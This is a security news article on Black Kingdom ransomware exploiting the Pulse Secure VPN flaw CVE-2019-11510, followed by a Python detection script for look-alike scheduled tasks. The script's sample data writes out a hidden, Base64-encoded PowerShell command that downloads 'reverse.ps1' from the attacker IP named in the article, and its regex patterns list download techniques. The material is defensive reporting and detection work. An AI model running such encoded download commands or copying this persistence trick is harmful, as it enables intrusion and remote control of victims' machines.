Monday, January 25, 20:46

Black Kingdom ransomware breaches networks with Pulse VPN defects

Black Kingdom ransomware operators target companies with unpatched Pulse Secure VPN software, according to security researchers.


The malware was caught in a honeypot, allowing researchers to analyze and document the tactics used by the threat actors.

They exploit CVE-2019-11510, a critical vulnerability affecting older versions of Pulse Secure VPN that was patched in April 2019. Organizations delayed updating their software even after exploits were published and the US government warned that threat actors were exploiting the flaw; some organizations still run a vulnerable version of the product.

REDTEAM.PL, a Polish cybersecurity company, observed that the Black Kingdom operators used this Pulse Secure VPN vulnerability as their entry point to breach what they believed was a target.

From the researchers' observations, the ransomware established persistence by masquerading as a legitimate scheduled task for Google Chrome, with the task name differing from the real one by only a single letter.

According to the REDTEAM.PL analysis, the scheduled task runs a Base64-encoded command in a hidden PowerShell window to fetch a script named "reverse.ps1", which is most likely used to open a reverse shell on the compromised host.

Adam Ziaja of REDTEAM.PL said the script could not be recovered from the attacker-controlled remote server, probably because the server hosting it was taken down before the payload was delivered.

The IP address hosting "reverse.ps1" is 198.13.49.179, which belongs to Choopa, a subsidiary of Vultr, a provider known for its cheap virtual private servers (VPS). Such servers are also used by cybercriminals to host their malicious tools.
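As an added illustration (not part of the article or of the REDTEAM.PL report), the following Python script shows how a defender might screen exported scheduled-task records for the persistence pattern described above: a task name one letter away from a legitimate Google Update task, a hidden PowerShell window, a Base64-encoded command, and a decoded payload that fetches a script from the IP address named in the report. The legitimate task names in LEGIT_TASK_NAMES, the two sample records and the decoy task name are assumptions constructed for this example; only the IP address and the script name come from the article.

```python
import base64
import re

# Assumed baseline of legitimate Google Update task names (an assumption for this example;
# compare against the actual task list of the environment you are defending).
LEGIT_TASK_NAMES = {"GoogleUpdateTaskMachineCore", "GoogleUpdateTaskMachineUA"}

# Indicator taken from the article: the host that served reverse.ps1.
KNOWN_BAD_IPS = {"198.13.49.179"}

# PowerShell accepts abbreviated switches, so match the short forms as well.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"-(?:windowstyle|w)\s+hidden", re.IGNORECASE)
DOWNLOAD_HINT = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|https?://",
    re.IGNORECASE,
)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot task names that are one letter off a real one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def decode_encoded_command(arguments: str):
    """Return the decoded -EncodedCommand payload (PowerShell expects UTF-16LE), or None."""
    m = ENC_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_task(name: str, command: str, arguments: str) -> dict:
    """Score one scheduled-task record and explain which traits triggered."""
    findings = []
    lookalike = any(edit_distance(name, legit) == 1 for legit in LEGIT_TASK_NAMES)
    if lookalike:
        findings.append("name is one edit away from a legitimate Google Update task")
    decoded = None
    downloads = False
    ioc_hit = False
    if "powershell" in command.lower():
        if HIDDEN_FLAG.search(arguments):
            findings.append("runs in a hidden PowerShell window")
        decoded = decode_encoded_command(arguments)
        if decoded is not None:
            findings.append("uses a Base64-encoded command")
            downloads = bool(DOWNLOAD_HINT.search(decoded))
            if downloads:
                findings.append("decoded command fetches remote content")
            for ip in IPV4.findall(decoded):
                if ip in KNOWN_BAD_IPS:
                    ioc_hit = True
                    findings.append(f"contacts known indicator {ip}")
    # A hidden window alone is common for benign admin tasks; require a stronger signal.
    suspicious = lookalike or ioc_hit or (decoded is not None and downloads)
    return {"task": name, "suspicious": suspicious, "findings": findings, "decoded": decoded}


def build_sample_tasks():
    """Constructed sample records (name, command, arguments): one legitimate task, one decoy."""
    payload = "Invoke-WebRequest -Uri http://198.13.49.179/reverse.ps1 -OutFile $env:TEMP\\reverse.ps1"
    encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
    return [
        ("GoogleUpdateTaskMachineUA",
         r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "/ua /installsource scheduler"),
        ("GoogleUpdateTaskMachineUS", "powershell.exe", f"-NoP -W Hidden -Enc {encoded}"),
    ]


if __name__ == "__main__":
    for task in build_sample_tasks():
        result = analyse_task(*task)
        print(result["task"], "SUSPICIOUS" if result["suspicious"] else "ok", result["findings"])
```

The same checks apply to a real export (for example the output of the Windows `schtasks /query /xml` command fed through an XML parser), and the decoded payload can be compared against the indicators in the article before the host is isolated.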


Recent appearance

Black Kingdom ransomware was first detected in late February by security researcher GrujaRS, who found that it appends the .DEMON extension to encrypted files.

The analyzed sample communicated with the same IP address found in the REDTEAM.PL report. It dropped a ransom note demanding that $10,000 be deposited in a bitcoin wallet and threatening that failure to pay would lead to the destruction or sale of the data.

Teo Ehc, https://www.secnews.gr
